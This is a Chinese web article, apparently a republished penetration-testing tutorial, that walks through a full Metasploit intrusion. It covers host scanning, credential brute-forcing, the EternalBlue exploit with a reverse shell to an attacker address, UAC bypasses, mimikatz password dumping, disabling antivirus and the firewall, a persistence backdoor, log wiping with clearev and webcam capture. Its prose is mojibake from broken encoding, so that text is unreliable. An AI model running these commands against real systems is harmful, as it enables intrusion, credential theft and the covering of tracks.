Äú¿ÉÒÔ¾èÖú£¬Ö§³ÖÎÒÃǵĹ«ÒæÊÂÒµ¡£

1Ôª 10Ôª 50Ôª





ÈÏÖ¤Â룺  ÑéÖ¤Âë,¿´²»Çå³þ?Çëµã»÷Ë¢ÐÂÑéÖ¤Âë ±ØÌî



  ÇóÖª ÎÄÕ ÎÄ¿â Lib ÊÓÆµ iPerson ¿Î³Ì ÈÏÖ¤ ×Éѯ ¹¤¾ß ½²×ù Model Center   Code  
»áÔ±   
   
 
     
   
 ¶©ÔÄ
  ¾èÖú
dz̸MSFÉøÍ¸²âÊÔ
 
  2252  次浏览      29
 2019-9-6
 

 

±à¼­ÍƼö:
±¾ÎÄÀ´×ÔÓÚ FreeBuf,±¾ÎÄÖ÷Òª½éÉÜÁËÔÚÉøÍ¸²âÊÔÖУ¬ÈçºÎʹÓÃÆµÂʽ϶àµÄMSFÃüÁʹMSFÖеĹ¥»÷Ä£¿é½øÐЩ¶´¹¥»÷£¬Ï£Íû¶ÔÄúµÄѧϰÓÐËù°ïÖú¡£

ÔÚÉøÍ¸¹ý³ÌÖУ¬MSF©¶´ÀûÓÃÉñÆ÷ÊDz»¿É»òȱµÄ¡£¸üºÎ¿öËüÊÇÒ»¸öÃâ·ÑµÄ¡¢¿ÉÏÂÔØµÄ¿ò¼Ü£¬Í¨¹ýËü¿ÉÒÔºÜÈÝÒ׵ػñÈ¡¡¢¿ª·¢²¢¶Ô¼ÆËã»úÈí¼þ©¶´ÊµÊ©¹¥»÷¡£Ëü±¾Éí¸½´øÊý°Ù¸öÒÑÖªÈí¼þ©¶´µÄרҵ¼¶Â©¶´¹¥»÷¹¤¾ß¡£ÊÇÐÅÏ¢ÊÕ¼¯¡¢Â©¶´É¨Ã衢ȨÏÞÌáÉý¡¢ÄÚÍøÉøÍ¸µÈ¼¯³ÉµÄ¹¤¾ß¡£

ǰ²»¾ÃMSF´Ó4.7Éý¼¶µ½MSF5.0,ÆäÖиĽøÁËÊý¾Ý¿âµÄ´¦ÀíÂß¼­£¬ÓÅ»¯ÁËmsfconsoleÖն˲Ù×÷£¬²¢½«PostgreSQL×÷Ϊһ¸öRESTful·þÎñµ¥¶ÀÔËÐС£´ËÍ⻹¼ÓÈëÒ»¸öWeb·þÎñ¿ò¼Ü£¬ÐµÄÃâɱģ¿é£¬ÓÅ»¯ÁË¿ØÖƹ¦Äܵȡ£

ÏÂÃæÐ¡°××ܽáÁËÒ»ÏÂÔÚÉøÍ¸²âÊÔÖУ¬Ê¹ÓÃÆµÂʽ϶àµÄMSFÃüÁ·ÖΪÒÔϼ¸¿éÀ´½²¡£

ÐÅÏ¢ÊÕ¼¯

·¢ÏÖÄ¿±êÍø¶ÎµÄ´æ»îÖ÷»ú:

ÎÒÃÇ¿ÉÒÔÀûÓÃauxiliaryÕâ¸öÄ£¿éÀ´»ñȡĿ±êÍø¶ËµÄÐÅÏ¢£¬°üÀ¨¶Ë¿Ú¿ª·ÅÇé¿ö¡¢Ö÷»ú´æ»îÇé¿ö¡£

auxiliary/scanner/discovery/arp_sweep

auxiliary/scancer/smb/smb_version ´æ»îµÄ445Ö÷»ú

auxiliary/scanner/portscan/syn ¶Ë¿ÚɨÃè

auxiliary/scanner/telnet/telnet_version telent·þÎñɨÃè

auxiliary/scanner/rdp/rdp_scanner Ô¶³Ì×ÀÃæ·þÎñɨÃè

auxiliary/scanner/ssh/ssh_version sshÖ÷»úɨÃè

¡£¡£¡£¡£¡£¡£

ͼƬһɨÃèÄ£¿éÐÅÏ¢

Ò»°ãÇé¿öÏÂÎÒÃÇÔÚÉøÍ¸²âÊÔµÄʱºò£¬Èç¹ûÔÚ²»ÖªµÀ×ʲúµÄÇé¿öÏ£¬ÎÒÃÇ»á°ÑÕû¸öÍø¶Ë½øÐÐɨÃè´æ»îÖ÷»ú£¬È»ºóÔÙ¶Ô´æ»îµÄÐÅÏ¢ÊÕ¼¯ÐÅÏ¢£¬ÕâÑùµÄ»°¾Í¿ÉÒÔËõ¶ÌÎÒÃǵÄÉøÍ¸²âÊÔʱ¼ä£¬¶ø²»Ã¤Ä¿µÄÈ¥²âÊÔ£¬ÓÐʱºòäĿÐÅÏ¢ÊÕ¼¯»áµ¼ÖºóÆÚÉøÍ¸µÄµÀ·¶¼ÊÇÍäµÄ£¬´ï²»µ½Ô¤ÆÚµÄЧ¹û¡£

²»¹ÜÊǶ˿ÚɨÃ軹ÊÇ̽²â´æ»îÖ÷»ú£¬¶¼ÊÇÒªÉèÖÃÄ¿±êIPµØÖ·set rhosts ipµØÖ·£¬Èç¹ûɨÃèÕû¸öÍø¶ÎµÄ»°£¬×îºóÉèÖÃÒ»ÏÂỊ̈߳ºset thread Ïß³ÌÊý(¸ù¾ÝÇé¿öÉèÖÃ)¡£

Ö´ÐÐrunÃüÁʼɨÃèÍø¶ÎµÄ´æ»îÖ÷»ú£¬·¢ÏÖÓÐ7̨·þÎñÆ÷´æ»î£¬ÕâÑùµÄ»°ÎÒÃǾͿÉÒÔ¶ÔÕâЩ´æ»îÖ÷»ú½øÐÐÏÂÒ»²½µÄÐÅÏ¢ÊÕ¼¯£¬±ÈÈç22¡¢445¡¢3389µÈÃô¸Ð¶Ë¿Ú¿ª·ÅÇé¿ö̽²â£¬ÔÚÕâÀïÐèҪ˵Ã÷һϣ¬ÒÔС°×µÄÉøÍ¸²âÊÔ¾­Ñ飬һ°ãÎÒÏȲ»É¨ÃèÕû¸öÍø¶Ë£¬ÒòΪÕâÑù¶ÔÄ¿±êÖ÷»úÓÐËðºÄ£¬¿ÉÒÔÖ±½ÓɨÃèÓÐÒç³ö©¶´µÄ¸ßΣ¶Ë¿Ú£¬Èç¹ûÓеϰ£¬ÄÇô¾Í¿ÉÒÔͨ¹ýÒç³ö½øÐÐÌáȨ£¬ÕâÑùµÄ·½·¨Ò²ÊÇÒ»Öֽݾ¶¡£Ïà·´µÄÇé¿öÏ£¬Èç¹ûÈ«¶Ë¿ÚɨÃèµÄ»°¸öÈ˽¨ÒéÓÃnmap¹¤¾ß¡£

ÏÂÃæÎÒÃÇ̽²âÒ»ÏÂÍø¶ÎÖпªÆô445¶Ë¿ÚµÄÖ÷»ú£¬Í¨¹ýɨÃè·¢ÏÖÍø¶ÎÖÐÓÐ3̨Ö÷»ú¿ªÆôÁË445¶Ë¿Ú£¬ÕâÑùµÄ»°ÎÒÃǾͿÉÒÔÔÚºóÆÚµÄ©¶´Ì½²âÖвâÊÔÊÇ·ñ´æÔÚÓÀºãÖ®À¶Â©¶´¡£

Use auxiliary/scanner/smb/smb_version

Set rhosts 192.168.201.1/24 //ÉèÖÃÄ¿±êÖ÷»úµØÖ·

Set threads 30 //ÉèÖÃɨÃèÏß³Ì

Run //Ö´ÐÐɨÃèÃüÁî

ǰÆÚÆäËüµÄ¶Ë¿ÚɨÃèµÄÃüÁî¶¼ÊDz¶àµÄ£¬ÏÂÃæÎÒÃǽéÉÜһϱ¬ÆÆµÄÄ£¿é£¬ÔÚkaliÖÐÓÐ×Ô¼ºÄÚÖõÄÃÜÂë±¾£¬µ±È»ÄãÒ²¿ÉÒÔÓÃ×Ô¼ºµÄ×ֵ䡣Äã¿´¶à·½±ã£¬ÏëÓþÍÓ㬲»ÓþͲ»Óá£

ÄÚÖÃÃÜÂë±íµÄµØÖ·£º

/usr/share/wordlists/metasploit/

Ò»°ã±¬ÆÆµÄ»°ÎÒÃÇ¿ÉÒÔ¶Ôssh¡¢mysql¡¢sql¡¢Oracle¡¢vnc¡¢telnetµÈ³£ÓõĶ˿Ú

auxiliary/scanner/mysql/mysql_login

auxiliary/scanner/mssql/mssql_login

auxiliary/scanner/ssh/ssh_login

¡£¡£¡£¡£¡£¡£

©¶´Ì½²â

½ÓÏÂÀ´ÎÒÃÇͨ¹ýǰÆÚµÄÐÅÏ¢ÊÕ¼¯£¬¿ÉÒԵõ½Ä¿±êÖ÷»úÖÐÓÐÈý̨Ö÷»ú¿ªÆôÁË445¶Ë¿Ú£¬ÎÒÃÇ¿ÉÒÔ½øÒ»²½Ì½²âÊDz»ÊÇ´æÔÚÓÀºãÖ®À¶Â©¶´¡£ÎÒÃÇ¿ÉÒÔÓÃÒÔÏÂÃüÁîÀ´Ì½²âһϣº

ÔÚ֮ǰ×öÅàѵµÄʱºò£¬±¾µØ´î½¨²âÊÔ»·¾³·¢ÏÖ2008 R2µÄ·þÎñÆ÷©¶´ÑéÖ¤µÄʱºò¾ÍÖ±½ÓÀ¶ÆÁ£¬¾ßÌåÔ­Òò²»Çå¡£ËùÒÔ´ó¼ÒÔÚÉøÍ¸²âÊԵĹý³ÌÖÐÒ»¶¨ÒªºÏÀíµÄÆÀ¹À©¶´µÄ¿ÉÓÃÐÔ¡£Í¨¹ýɨÃè·¢ÏÖÓÐһ̨Ŀ±êÖ÷»ú´æÔÚÓÀºãÖ®À¶Â©¶´¡£Æäʵ³ýÁËÓÀºãÖ®À¶£¬Ò²ÓÐÐí¶àÆäËüµÄÒç³ö©¶´£¬ÔÚÕâÀï¾Í²»Ò»Ò»Ïê½âÁË£¬Ô­Àí¶¼Ò»Ñù¡£

use auxiliary/scanner/smb/smb_ms17_010 //ʹÓÃÓÀºãÖ®À¶Ì½²âÄ£¿é
how options ²é¿´ÐèÒªÌí¼ÓµÄÐÅÏ¢
set rhosts 192.168.205.1/24 //ÉèÖÃɨÃèÄ¿±êÖ÷»úIPµØÖ·
set threads 30 //ÉèÖÃɨÃèÏß³Ì
Run //¿ªÆôɨÃè

©¶´ÀûÓÃ

ͨ¹ý©¶´Ì½²â½×¶ÎÎÒÃÇ·¢ÏÖ192.168.205.150Õą̂Ŀ±êÖ÷»ú´æÔÚÓÀºãÖ®À¶Â©¶´£¬ÄÇÎÒÃÇ¿ÉÒÔʹÓÃMSFÖеĹ¥»÷Ä£¿é½øÐЩ¶´¹¥»÷£¬¿´¿´Äܲ»ÄÜ»ñÈ¡µ½Ä¿±êÖ÷»úµÄwebshell£¬ÕâÑùµÄ»°£¬ÎÒÃǾͿÉÒÔͨ¹ýÒç³ö©¶´À´¸ãÄÚÍøµÄºáÏòɨÃè¡£Ö´ÐÐÒÔÏÂÃüÁ

use exploit/windows/smb/ms17_010_eternalblue //ʹÓÃÓÀºãÖ®À¶¹¥»÷Ä£¿é
set payload windows/meterpreter/reverse_tcp //ÉèÖÃÒ»¸öPayload£¬Ê¹¹¥»÷»ú½ÓÊÜÀ´×ÔÄ¿±êÖ÷»úµÄsession
set rhosts 192.168.205.150 //ÉèÖÃÄ¿±êÖ÷»úµØÖ·
set lhost 192.168.205.148 //ÉèÖýÓÊÜpayloadµÄµØÖ·£¬ÎÒÃÇÕâÀïÉèÖÃMSFµÄµØÖ·
set LPORT 5555 // ÉèÖýÓÊܵĶ˿ڣ¬Õâ¸ö×Ô¼º×Ô¶¨Ò壬ֻҪ²»ÓëÆäËü¶Ë¿Ú³åÍ»¾Í¿ÉÒÔ
Exploit //Ö´Ðй¥»÷ÃüÁî

ȨÏÞÌáÉý

µ±ÎÒÃǵõ½Ò»¸öÄ¿±êÖ÷»ú·µ»ØµÄshellºó£¬ÎÒÃǵÚÒ»²½Òª¿´µÄÊǵ±Ç°Óû§ÊDz»ÊǹÜÀíԱȨÏÞ£¬Èç¹û²»ÊǹÜÀíԱȨÏÞ£¬Õâ¸öʱºòÐèÒªÎÒÃÇÈ¥ÌáȨ¡£ÎÒÃÇ¿ÉÒÔÀûÓÃkailiÖеı¾µØÌáȨµÄ·½Ê½£¬ÏÂÃæ½éÉÜһϱ¾µØÌáÈ¨ÈÆ¹ýUACµÄ·½Ê½ÌáÉýµ±Ç°Óû§È¨ÏÞ£¬ÒÔÏÂÊÇÏêϸµÄÃüÁîÒÔ¼°²½Ö裺

ÎÒÃÇÊ×ÏȽéÉÜÒ»ÏÂÕâ¸öUACµ½µ×ÊÇʲô¶«¶«£¬ÊÇÔõôÔËÐеģ¿

1.ʲôÊÇUAC£¿

MicrosoftµÄWindows VistaºÍWindows Server 2008²Ù×÷ϵͳÒýÈëÁËÒ»ÖÖÁ¼ºÃµÄÓû§ÕÊ»§¿ØÖƼܹ¹£¬ÒÔ·Àֹϵͳ·¶Î§ÄÚµÄÒâÍâ¸ü¸Ä£¬ÕâÖÖ¸ü¸ÄÊÇ¿ÉÒÔÔ¤¼ûµÄ£¬²¢ÇÒÖ»ÐèÒªºÜÉٵIJÙ×÷Á¿¡£ËüÊÇWindowsµÄÒ»¸ö°²È«¹¦ÄÜ£¬ËüÖ§³Ö·ÀÖ¹¶Ô²Ù×÷ϵͳ½øÐÐδ¾­ÊÚȨµÄÐ޸ģ¬UACÈ·±£½öÔÚ¹ÜÀíÔ±ÊÚȨµÄÇé¿öϽøÐÐijЩ¸ü¸Ä¡£Èç¹û¹ÜÀíÔ±²»ÔÊÐí¸ü¸Ä£¬Ôò²»»áÖ´ÐÐÕâЩ¸ü¸Ä£¬²¢ÇÒWindowsϵͳ±£³Ö²»±ä¡£

2.UACÈçºÎÔËÐУ¿

UACͨ¹ý×èÖ¹³ÌÐòÖ´ÐÐÈκÎÉæ¼°ÓйØÏµÍ³¸ü¸Ä/ÌØ¶¨ÈÎÎñµÄÈÎÎñÀ´ÔËÐС£³ý·Ç³¢ÊÔÖ´ÐÐÕâЩ²Ù×÷µÄ½ø³ÌÒÔ¹ÜÀíԱȨÏÞÔËÐУ¬·ñÔòÕâЩ²Ù×÷½«ÎÞ·¨ÔËÐС£Èç¹ûÄúÒÔ¹ÜÀíÔ±Éí·ÝÔËÐгÌÐò£¬ÔòËü½«¾ßÓиü¶àȨÏÞ£¬ÒòΪËü½«±»¡°ÌáÉýȨÏÞ¡±£¬¶ø²»ÊÇÒÔ¹ÜÀíÔ±Éí·ÝÔËÐеijÌÐò¡£

ÒòΪÓеÄÓû§ÊÇûÓйÜÀíԱȨÏÞ£¬Ã»ÓйÜÀíԱȨÏÞÊÇÔËÐв»ÁËÄÄЩֻÄÜͨ¹ý¹ÜÀíԱȨÏÞ²ÅÄܲÙ×÷µÄÃüÁî¡£±ÈÈçÐÞ¸Ä×¢²á±íÐÅÏ¢¡¢´´½¨Óû§¡¢¶ÁÈ¡¹ÜÀíÔ±ÕË»§ÃÜÂë¡¢ÉèÖüƻ®ÈÎÎñÌí¼Óµ½¿ª»úÆô¶¯ÏîµÈ²Ù×÷¡£

×îÖ±½ÓµÄÌáȨÃüÁgetsystem

ÈÆ¹ýUAC·À»¤»úÖÆµÄǰÌáÊÇÎÒÃÇÊ×ÏÈͨ¹ýexplloit»ñµÃÄ¿±êÖ÷»úµÄmeterprter¡£»ñµÃmeterpreter»á»°1ºó£¬ÊäÈëÒÔÏÂÃüÁîÒÔ¼ì²éÊÇ·ñÊÇsystemȨÏÞ¡£ÔÚÕâÀïÎҾͲ»Ö±½ÓÑÝʾÁË£¬Ö±½ÓÉÏÃüÁ×Ô¼º¶àÁ·Ï°Á·Ï°¼´¿É£¬Ëù»°ËµÊìÄÜÉúÇÉ¡£ÎÒÃÇÐèÒª°Ñ»ñÈ¡µ½µÄsession±£´æµ½ºǫ́£¬Ö´ÐÐbackground

·½·¨Ò»:

use exploit/windows/local/bypassuac //½«Í¨¹ý½ø³Ì×¢ÈëʹÓÿÉÐÅÈη¢²¼ÕßÖ¤ÊéÈÆ¹ýWindows UAC¡£Ëü½«Éú³É¹Ø±ÕUAC±êÖ¾µÄµÚ¶þ¸öshell¡£

set session 1 //ʹÓÃsessino 1

Exploit //Ö´ÐÐȨÏÞÌáÉýµÄ¹¥»÷ģʽ

Ö´ÐÐÍê±Ï³É¹¦ºó£¬Ôٴβéѯµ±Ç°Óû§µÄȨÏ޾ͻáÌáÉýµ½¹ÜÀíԱȨÏÞ¡£ÎÒÕâÀïÒѾ­ÊǹÜÀíԱȨÏÞÁË£¬ËùÒÔ»á³öÏÖÕâÑùµÄÌáʾ¡£

·½·¨¶þ£ºWindowsȨÏÞÌáÉýÈÆ¹ýUAC±£»¤£¨ÄÚ´æ×¢È룩

´ËÄ£¿é½«Í¨¹ý½ø³Ì×¢ÈëʹÓÿÉÐÅÈεķ¢²¼ÕßÖ¤ÊéÈÆ¹ýWindows UAC¡£Ëü½«Éú³É¹Ø±ÕUAC±êÖ¾µÄµÚ¶þ¸öshell¡£ÔÚÆÕͨ¼¼ÊõÖУ¬¸ÃÄ£¿éʹÓ÷´ÉäʽDLL×¢Èë¼¼Êõ²¢Ö»³ýÈ¥ÁËDLL payload ¶þ½øÖÆÎļþ£¬¶ø²»ÊÇÈý¸öµ¥¶ÀµÄ¶þ½øÖÆÎļþ¡£µ«ÊÇ£¬ËüÐèҪѡÔñÕýÈ·µÄÌåϵ¼Ü¹¹£¨¶ÔÓÚSYSWOW64ϵͳҲʹÓÃx64£©¡£Ö´ÐÐÍê±ÏÒÔÏÂÃüÁµ±Ç°Óû§È¨Ï޾ͻá±äΪ¹ÜÀíԱȨÏÞ¡£

use exploit/windows/local/bypassuac_fodhelper
set session
1Exploit

·½·¨Èý£ºÍ¨¹ýCOM´¦Àí³ÌÐò½Ù³Ö

Ê×ÏȽéÉÜÒ»ÏÂÕâ¸öCOM´¦Àí³ÌÐò½Ù³Ö£¬´ËÄ£¿é½«Í¨¹ýÔÚhkcuÅäÖõ¥ÔªÖд´½¨COM´¦Àí³ÌÐò×¢²á±íÏîÀ´ÈƹýWindows UAC¡£µ±¼ÓÔØÄ³Ð©½Ï¸ßÍêÕûÐÔ¼¶±ð½ø³Ìʱ£¬»áÒýÓÃÕâЩע²á±íÏ´Ó¶øµ¼Ö½ø³Ì¼ÓÔØÓû§¿ØÖƵÄDLL¡£ÕâЩDLL°üº¬µ¼Ö»ỰȨÏÞÌáÉýµÄpayload¡£´ËÄ£¿éÐÞ¸Ä×¢²á±íÏµ«ÔÚµ÷ÓÃpayloadºó½«Çå³ý¸ÃÏî¡£Õâ¸öÄ£¿éÐèÒªpayloadµÄÌåϵ¼Ü¹¹ºÍ²Ù×÷ϵͳƥÅ䣬µ«Êǵ±Ç°µÄµÍȨÏÞmeterpreter»á»°Ìåϵ¼Ü¹¹ÖпÉÄܲ»Í¬¡£Èç¹ûÖ¸¶¨exe:£ºcustom£¬ÔòÓ¦ÔÚµ¥¶ÀµÄ½ø³ÌÖÐÆô¶¯payloaºóµ÷ÓÃExitProcess£¨£©¡£´ËÄ£¿éͨ¹ýÄ¿±êÉϵÄcmd.exeµ÷ÓÃÄ¿±ê¶þ½øÖÆÎļþ¡£Òò´Ë£¬Èç¹ûcmd.exe·ÃÎÊÊܵ½ÏÞÖÆ£¬´ËÄ£¿é½«ÎÞ·¨Õý³£ÔËÐС£

ÃüÁîÖ´ÐУº

use exploit/windows/local/bypassuac_comhijack
set session
1Exploit

·½·¨ËÄ£ºÍ¨¹ýEventvwr×¢²á±íÏî

Ê×ÏȽéÉÜÒ»ÏÂÕâ¸öÄ£¿é£¬´ËÄ£¿é½«Í¨¹ýÔÚµ±Ç°Óû§ÅäÖõ¥ÔªÏ½ٳÖ×¢²á±íÖеÄÌØÊâ¼ü²¢²åÈ뽫ÔÚÆô¶¯Windowsʼþ²é¿´Æ÷ʱµ÷ÓõÄ×Ô¶¨ÒåÃüÁîÀ´ÈƹýWindows UAC¡£Ëü½«Éú³É¹Ø±ÕUAC±êÖ¾µÄµÚ¶þ¸öshell¡£´ËÄ£¿éÐÞ¸Ä×¢²á±íÏµ«ÔÚµ÷ÓÃpayloadºó½«Çå³ý¸ÃÏî¡£¸ÃÄ£¿é²»ÐèÒªpayloadµÄÌåϵ¼Ü¹¹ºÍ²Ù×÷ϵͳƥÅä¡£Èç¹ûÖ¸¶¨EXE ::Custom£¬ÔòÓ¦ÔÚµ¥¶ÀµÄ½ø³ÌÖÐÆô¶¯payloadºóµ÷ÓÃExitProcess£¨£©¡£

use exploit/windows/local/bypassuac_eventvwr
set session
1Exploit

ÒÔÉϵı¾µØÌáȨµÄÄ£¿é´ó¼Ò¿ÉÒÔ±¾µØÈ¥²âÊÔһϣ¬³ýÁËÕâЩij¿é»¹ÓÐÆäËüµÄͨ¹ýÖ±½Óͨ¹ýincognitoÖеÄaddlocalgroupuserÌáÉý¡¢ms13-081¡¢ms15-051¡¢ms16-032¡¢MS16-016¡¢MS14-068¡¢ms188120win32k_privescÓòȨÏÞÌáÉýµÈÆäËüµÄȨÏÞÌáÉý·½·¨¡£Ð¡°×ÔÚÄÚÍøÉøÍ¸²âÊԵĹý³ÌÖз¢ÏÖһЩ¿Í»§µÄ·þÎñÆ÷´ó¶àÊýΪ2003¡¢2008·þÎñÆ÷£¬ºÜÉÙ2012¡¢2016·þÎñÆ÷¡£

ÄÚÍøÉøÍ¸

¼ÈȻĿ±êÖ÷»úshellÒ²·´µ¯ÁË£¬Óû§È¨ÏÞ´ÓµÍȨÏÞÒ²ÌáÉýµ½Á˹ÜÀíԱȨÏÞ£¬ÄÇô½ÓÏÂÀ´¾ÍÊÇÎÒÃǽøÐÐÄÚÍøÉøÍ¸µÄʱºòÁË£¬ÄÚÍøÉøÍ¸Éæ¼°µÄÃæ±È½Ï¹ã£¬ÔÚÕâÒ»½ÚÒ²»áÏêϸµÄÊáÀíһϳ£ÓõÄÃüÁî¡£

cat //²é¿´ÎļþÄÚÈÝ
Getwd //²é¿´µ±Ç°¹¤×÷Ŀ¼
Download //ÏÂÔØÎļþµ½±¾µØ

±¾µØ´´½¨Ò»¸ö1.txt,½«1.txtÉÏ´«µ½Ä¿±ê·þÎñÆ÷µÄ×ÀÃæÎ»Öãº

Upload /opt/1.txt Ä¿±êÖ÷»ú

ÎÒÃÇÔÚÄ¿±êÖ÷»úÉÏÃæ´´½¨Ò»¸öpass.txt,ÄÚÈÝΪhello hack!!!!,ÔÚMSFÉÏÖ´ÐÐdownloadÏÂÔØÃüÁ½«pass.txtÏÂÔØµ½¹¥»÷»úÉÏÃæ¡£

ÃüÁî¸ñʽ£ºDownload Ä¿±êÖ÷»úÎļþ ±¾µØÎļþ·¾¶

Ipconfig/ifoncig //²é¿´Ä¿±êÖ÷»úIPµØÖ·£»
arp ¨Ca //ÓÃÓڲ鿴¸ßËÙ»º´æÖеÄËùÓÐÏîÄ¿£»
route //´òӡ·ÓÉÐÅÏ¢£»
netstat -na //¿ÉÒÔÏÔʾËùÓÐÁ¬½ÓµÄ¶Ë¿Ú

Rdesktop //ʹÓÃrdesktopÀ´Á¬½Ó -u Óû§Ãû -p ÃÜÂë,Õâ¸öÃüÁîÐèÒªÔÚkaliÉÏÃæ°²×°Ò»Ï¡£µ±ÎÒÃÇ»ñÈ¡µ½¹ÜÀíÔ±Õ˺ÅÃÜÂëµÄʱºò¾Í¿ÉÒÔÖ±½Ó±¾µØÔ¶³ÌµÇ½Ŀ±êÖ÷»ú¡£

¡­¡­.

ÆäÖзÓÉÐÅÏ¢¶ÔÓÚÉøÍ¸ÕßÀ´ËµÌØÓÐÓã¬ÒòΪ¹¥»÷»ú´¦ÓÚÍâÍø£¬Ä¿±êÖ÷»ú´¦ÓÚÄÚÍø£¬ËûÃÇÖ®¼äÊDz»ÄÜͨÐŵ쬹ÊÐèÒªÌí¼Ó·ÓÉÀ´°Ñ¹¥»÷»úµÄIPÌí¼Óµ½ÄÚÍøÀïÃæ£¬ÕâÑùÎÒÃǾͿÉÒÔºáɨÄÚÍø£¬¾ÍÊÇËùνµÄÄÚÍø´úÀí¡£

Ê×ÏÈÎÒÃÇÐèÒª»ñÈ¡Íø¶Î£¬È»ºóÔÙÌí¼Ó·ÓÉ£¬Ìí¼Ó³É¹¦ºó¾Í¿ÉÒÔºáÏòɨÃèÄÚÍøÖ÷»ú¡£

run get_local_subnets //»ñÈ¡Íø¶Î
run autoroute -s 192.168.205.1/24 //Ìí¼Ó·ÓÉ
run autoroute -p //²é¿´Â·ÓÉ
run autoroute -d -s 172.2.175.0 //ɾ³ýÍø¶Î
run post/windows/gather/arp_scanner RHOSTS=7.7.7.0/24 //̽²â¸ÃÍø¶ÎϵĴæ»îÖ÷»ú¡£
meterpreter > background //ºǫ́sessions

ϵͳÐÅÏ¢:

Ps //²é¿´Ä¿±êÖ÷»úµÄ½ø³ÌÐÅÏ¢
Kill //ɱµôij¸ö½ø³Ì
Getuid //²é¿´È¨ÏÞ
Pwd ²é¿´µ±Ç°Ä¿Â¼Â·¾¶(Ä¿±êÖ÷»ú)
Sysinfo //²é¿´Ä¿±êÖ÷»úÐÅÏ¢£¬±ÈÈç°æ±¾ÐÅÏ¢µÈ
Shutdown //¹Ø»ú²Ù×÷(½÷É÷²Ù×÷)

PostÄ£¿éÐÅÏ¢,Õâ¸öÓõıȽ϶࣬±ÈÈç¼ì²éÄ¿±êϵͳÊDz»ÊÇÐé»ú¡¢°²×°ÁËÄÄЩÈí¼þ¡¢²¹¶¡ÐÅÏ¢µÈ¡£ÆäʵÕâ¸öÄ£¿é²»½öÏÞÓÚÕâЩģ¿é£¬ÓÐÐËȤµÄ´óÀпÉÒÔÈ¥ÍæÒ»Íæ¡£

Run post/windows/gather/checkvm //²é¿´Ä¿±êÖ÷»úÊÇ·ñΪÐé»ú£»
run post/windows/gather/enum_applications //»ñȡĿ±êÖ÷»ú°²×°Èí¼þÐÅÏ¢£»
Run post/windows/gather/enum_patches //²é¿´Ä¿±êÖ÷»úµÄ²¹¶¡ÐÅÏ¢£»
run post/windows/gather/enum_domain //²éÕÒÄ¿±êÖ÷»úÓò¿Ø¡£ÎÒ±¾µØÃ»ÓÐÓò¿Ø£»
run post/windows/manage/killav //¹Ø±Õɱ¶¾Èí¼þ£»
run post/windows/manage/enable_rdp //¿ªÆô3389Ô¶³Ì×ÀÃæ£»
run post/windows/gather/enum_logged_on_users //Áоٵ±Ç°µÇ½¹ýÖ÷»úµÄÓû§£»
run post/windows/gather/credentials/windows_autologin //ץȡ×Ô¶¯µÇ½µÄÓû§ÃûºÍÃÜÂ룻
run post/windows/manage/enable_rdp username=xxx password=xxx //Ìí¼ÓÔ¶³Ì×ÀÃæµÄÓû§(ͬʱҲ»á½«¸ÃÓû§Ìí¼Óµ½¹ÜÀíÔ±×é)

LoadÃüÁîÊǼÓÔØÄ£¿éµÄ£¬ÔÚ²âÊÔÖÐÓõÄ×î¶àµÄ¾ÍÊÇץȡÓû§ÃÜÂëµÄÕâ¸öÄ£¿é¡£

load mimikatz //¼ÓÔØmimikatz£¬ÓÃÓÚץȡÃÜÂ룬²»ÏÞÓÚÃ÷ÎÄÃÜÂëºÍhashÖµ£»
Run hashdump //»ñÈ¡Óû§ÃÜÂëhashÖµ
msv //»ñÈ¡µÄÊÇhashÖµ
Ssp //»ñÈ¡µÄÊÇÃ÷ÎÄÐÅÏ¢
wdigest //¶ÁÈ¡ÄÚ´æÖдæ·ÅµÄÕ˺ÅÃÜÂëÃ÷ÎÄÐÅÏ¢
mimikatz_command -f samdump::hashes //»ñÈ¡Óû§hash
mimikatz_command -f handle::list //ÁгöÓ¦Óýø³Ì
mimikatz_command -f service::list //Áгö·þÎñ

ºóÃų־û¯

ȨÏÞά³Ö

PersistenceÄ£¿é

ÎÒÃÇÏÈ¿´Ò»ÏÂPersistenceÄ£¿éÐÅÏ¢£º

Run persistence -h //²é¿´°ïÖúÐÅÏ¢£»
run persistence -U -i 5 -p 5555 -r 192.168.205.148

-U£ºÉèÖúóÃÅÔÚÓû§µÇ¼ºó×ÔÆô¶¯¡£¸Ã·½Ê½»áÔÚHKCU\Software\Microsoft\Windows\CurrentVersion\RunÏÂÌí¼Ó×¢²á±íÐÅÏ¢¡£ÍƼöʹÓøòÎÊý£»

-i£ºÉèÖ÷´ÏòÁ¬½Ó¼ä¸ôʱ¼ä£¬µ¥Î»ÎªÃ룻

-p£ºÉèÖ÷´ÏòÁ¬½ÓµÄ¶Ë¿ÚºÅ£»

-r£ºÉèÖ÷´ÏòÁ¬½ÓµÄipµØÖ·¡£

Metsvc Ä£¿é£º

Õâ¸öÄ£¿éʹÓ÷dz£¼òµ¥£¬ÎÒÃÇÊ×ÏÈ¿´Ò»ÏÂÕâ¸öÄ£¿éµÄÐÅÏ¢:

Ö±½ÓÔËÐÐrun metsvc£¬ÃüÁîÖ´ÐÐÍê±ÏºóÔÚÄ¿±êÖ÷»úÉÏÃæ¾Í»áÓÐÒ»¸ömeterpreterÕâ¸ö·þÎñ£¬ÀàÐÍΪ×Ô¶¯Æô¶¯¡£

¿ªÆôÁíÒ»¸ö¿Í»§¶ËÓÃhanderϵļàÌýÄ£¿é£¬ÖØÐ»ñÈ¡shell£¬ÕâÀïµÄ¼àÌýµÄ¶Ë¿ÚΪ31337

ºÛ¼£Çå³ý

ÔÚÉøÍ¸ÈëÇֵĹý³ÌÖÐÄÑÃâ»áÁôÏÂÒ»ÏÂÈÕÖ¾ÐÅÏ¢ºÛ¼££¬ÎÒÃÇ¿ÉÒÔʹÓôËÃüÁîÀ´²Á³ýÁôϵĺۼ££º

clearevÕâ¸öÃüÁîÊÇ×îÖ±½ÓµÄɾ³ýÈÕÖ¾µÄÃüÁî¡£

ÔËÐÐÃüÁîºóÄ¿±êÖ÷»úÉÏÃæµÄÈÕÖ¾»áÈ«²¿É¾³ý¡£

²¹³äÆäËü

³ýÁËÉÏÊöµÄÍ⣬ÏÂÃæÔÚ»ã×ÜһЩÆäËüµÄ²Ù×÷ÃüÁî

Run getgui -e //¿ªÆôÔ¶³Ì×ÀÃæ£»
Run getgui -u cmdback -p 123123 //Ìí¼ÓÓû§
Run getgui -f 4446 -e //½«Ä¿±êÖ÷»úÉÏÃæµÄ3389¶Ë¿Úת·¢µ½4446
netsh advfirewall set allprofiles state off //¹Ø±Õ·À»ðǽ
Webscan_list //²é¿´ÉãÏñÍ·ÁÐ±í£»
Webscan_stream //ÉãÏñÍ·ÊÓÆµ»ñÈ¡£»
